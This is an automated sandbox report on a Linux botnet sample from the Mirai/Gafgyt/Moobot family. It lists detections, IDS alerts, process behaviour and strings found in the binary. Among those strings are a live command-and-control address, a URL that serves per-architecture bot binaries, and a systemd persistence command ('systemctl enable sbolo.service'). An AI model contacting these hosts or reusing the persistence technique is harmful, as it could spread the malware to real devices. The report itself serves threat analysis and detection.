Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1528133
MD5:ecffaf9ddeb2137988036bf8d7153b67
SHA1:834a8cce9907e2ce918040cef2944f5d1dcb0d08
SHA256:1afd5b2da3e7a198208d882e61c3c651b7718ce9d67a4c6f0c2c882492f7eb41
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Moobot
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528133
Start date and time:2024-10-07 16:28:04 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 7s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal100.troj.linELF@0/3@30/0
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:5490
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
bolu_botnet_done.
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 5490, Parent: 5414, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 5492, Parent: 5490)
    • na.elf New Fork (PID: 5494, Parent: 5490)
    • sh (PID: 5494, Parent: 5490, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
      • sh New Fork (PID: 5496, Parent: 5494)
      • systemctl (PID: 5496, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service
    • na.elf New Fork (PID: 5500, Parent: 5490)
  • systemd New Fork (PID: 5498, Parent: 5497)
  • snapd-env-generator (PID: 5498, Parent: 5497, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    na.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      na.elfJoeSecurity_MoobotYara detected MoobotJoe Security
        SourceRuleDescriptionAuthorStrings
        5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
          5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
              Process Memory Space: na.elf PID: 5490JoeSecurity_OkiruYara detected OkiruJoe Security
                Process Memory Space: na.elf PID: 5490JoeSecurity_MoobotYara detected MoobotJoe Security
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-07T16:28:53.058288+020020304901Malware Command and Control Activity Detected192.168.2.145843091.200.103.11723561TCP
                  2024-10-07T16:28:58.707877+020020304901Malware Command and Control Activity Detected192.168.2.145843291.200.103.11723561TCP
                  2024-10-07T16:29:03.667039+020020304901Malware Command and Control Activity Detected192.168.2.145843491.200.103.11723561TCP
                  2024-10-07T16:29:09.389345+020020304901Malware Command and Control Activity Detected192.168.2.145843691.200.103.11723561TCP
                  2024-10-07T16:29:18.398905+020020304901Malware Command and Control Activity Detected192.168.2.145843891.200.103.11723561TCP
                  2024-10-07T16:29:27.047574+020020304901Malware Command and Control Activity Detected192.168.2.145844091.200.103.11723561TCP
                  2024-10-07T16:29:32.707714+020020304901Malware Command and Control Activity Detected192.168.2.145844291.200.103.11723561TCP
                  2024-10-07T16:29:42.335065+020020304901Malware Command and Control Activity Detected192.168.2.145844491.200.103.11723561TCP
                  2024-10-07T16:29:49.970562+020020304901Malware Command and Control Activity Detected192.168.2.145844691.200.103.11723561TCP
                  2024-10-07T16:30:00.652513+020020304901Malware Command and Control Activity Detected192.168.2.145844891.200.103.11723561TCP
                  2024-10-07T16:30:11.483573+020020304901Malware Command and Control Activity Detected192.168.2.145845091.200.103.11723561TCP
                  2024-10-07T16:30:19.141822+020020304901Malware Command and Control Activity Detected192.168.2.145845291.200.103.11723561TCP
                  2024-10-07T16:30:25.773355+020020304901Malware Command and Control Activity Detected192.168.2.145845491.200.103.11723561TCP
                  2024-10-07T16:30:32.421776+020020304901Malware Command and Control Activity Detected192.168.2.145845691.200.103.11723561TCP
                  2024-10-07T16:30:43.097400+020020304901Malware Command and Control Activity Detected192.168.2.145845891.200.103.11723561TCP
                  2024-10-07T16:30:53.732411+020020304901Malware Command and Control Activity Detected192.168.2.145846091.200.103.11723561TCP
                  2024-10-07T16:30:58.403261+020020304901Malware Command and Control Activity Detected192.168.2.145846291.200.103.11723561TCP
                  2024-10-07T16:31:04.045222+020020304901Malware Command and Control Activity Detected192.168.2.145846491.200.103.11723561TCP
                  2024-10-07T16:31:07.698392+020020304901Malware Command and Control Activity Detected192.168.2.145846691.200.103.11723561TCP
                  2024-10-07T16:31:16.376213+020020304901Malware Command and Control Activity Detected192.168.2.145846891.200.103.11723561TCP
                  2024-10-07T16:31:21.699517+020020304901Malware Command and Control Activity Detected192.168.2.145847091.200.103.11723561TCP
                  2024-10-07T16:31:29.329455+020020304901Malware Command and Control Activity Detected192.168.2.145847291.200.103.11723561TCP
                  2024-10-07T16:31:38.374808+020020304901Malware Command and Control Activity Detected192.168.2.145847491.200.103.11723561TCP
                  2024-10-07T16:31:44.860656+020020304901Malware Command and Control Activity Detected192.168.2.145847691.200.103.11723561TCP
                  2024-10-07T16:31:47.518777+020020304901Malware Command and Control Activity Detected192.168.2.145847891.200.103.11723561TCP
                  2024-10-07T16:31:59.490488+020020304901Malware Command and Control Activity Detected192.168.2.145848091.200.103.11723561TCP
                  2024-10-07T16:32:05.266675+020020304901Malware Command and Control Activity Detected192.168.2.145848291.200.103.11723561TCP
                  2024-10-07T16:32:17.530926+020020304901Malware Command and Control Activity Detected192.168.2.145848491.200.103.11723561TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: na.elfAvira: detected
                  Source: na.elfReversingLabs: Detection: 52%
                  Source: na.elfString: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/etc/systemd/system/sbolo.servicew[Unit]

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58442 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58446 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58432 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58440 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58444 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58470 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58438 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58430 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58448 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58434 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58458 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58478 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58452 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58464 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58454 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58480 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58456 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58482 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58450 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58484 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58468 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58436 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58466 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58472 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58474 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58462 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58476 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.14:58460 -> 91.200.103.117:23561
                  Source: global trafficTCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561
                  Source: global trafficTCP traffic: 192.168.2.14:58430 -> 91.200.103.117:23561
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: yi0key.heleh.com.vn
                  Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                  Source: na.elfString found in binary or memory: http://91.200.103.117/%s
                  Source: na.elf, 5490.1.00007f28c446e000.00007f28c4479000.rw-.sdmp, sbolo.service.12.drString found in binary or memory: http://91.200.103.117/bolubotnetmips
                  Source: Initial sampleString containing 'busybox' found: busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/etc/systemd/system/sbolo.servicew[Unit]
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: classification engineClassification label: mal100.troj.linELF@0/3@30/0
                  Source: /tmp/na.elf (PID: 5494)Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"Jump to behavior
                  Source: /bin/sh (PID: 5496)Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.serviceJump to behavior
                  Source: /tmp/na.elf (PID: 5490)Queries kernel information via 'uname': Jump to behavior
                  Source: na.elf, 5490.1.000055929b867000.000055929b8ee000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
                  Source: na.elf, 5490.1.000055929b867000.000055929b8ee000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
                  Source: na.elf, 5490.1.00007ffdfcea4000.00007ffdfcec5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
                  Source: na.elf, 5490.1.00007ffdfcea4000.00007ffdfcec5000.rw-.sdmpBinary or memory string: qx86_64/usr/bin/qemu-mips/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f28c4400000.00007f28c4429000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5490, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information2
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Systemd Service
                  1
                  Systemd Service
                  Direct Volume AccessOS Credential Dumping11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Non-Standard Port
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Scripting
                  Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528133 Sample: na.elf Startdate: 07/10/2024 Architecture: LINUX Score: 100 20 yi0key.heleh.com.vn 91.200.103.117, 23561, 58430, 58432 COMBAHTONcombahtonGmbHDE Germany 2->20 22 daisy.ubuntu.com 2->22 24 Suricata IDS alerts for network traffic 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 Detected Mirai 2->28 30 5 other signatures 2->30 8 na.elf 2->8         started        10 systemd snapd-env-generator 2->10         started        signatures3 process4 process5 12 na.elf sh 8->12         started        14 na.elf 8->14         started        16 na.elf 8->16         started        process6 18 sh systemctl 12->18         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  na.elf53%ReversingLabsLinux.Backdoor.Mirai
                  na.elf100%AviraEXP/ELF.Agent.J.8
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  daisy.ubuntu.com
                  162.213.35.25
                  truefalse
                    unknown
                    yi0key.heleh.com.vn
                    91.200.103.117
                    truetrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://91.200.103.117/%sna.elffalse
                        unknown
                        http://91.200.103.117/bolubotnetmipsna.elf, 5490.1.00007f28c446e000.00007f28c4479000.rw-.sdmp, sbolo.service.12.drfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          91.200.103.117
                          yi0key.heleh.com.vnGermany
                          30823COMBAHTONcombahtonGmbHDEtrue
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          91.200.103.117na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                            na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                    na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        daisy.ubuntu.comna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousGafgytBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 162.213.35.24
                                        na.elfGet hashmaliciousGafgytBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 162.213.35.25
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 162.213.35.24
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 162.213.35.25
                                        yi0key.heleh.com.vnna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        COMBAHTONcombahtonGmbHDEna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                        • 91.200.103.117
                                        7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                        • 194.59.31.31
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                        • 194.59.31.225
                                        9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                        • 194.59.30.201
                                        No context
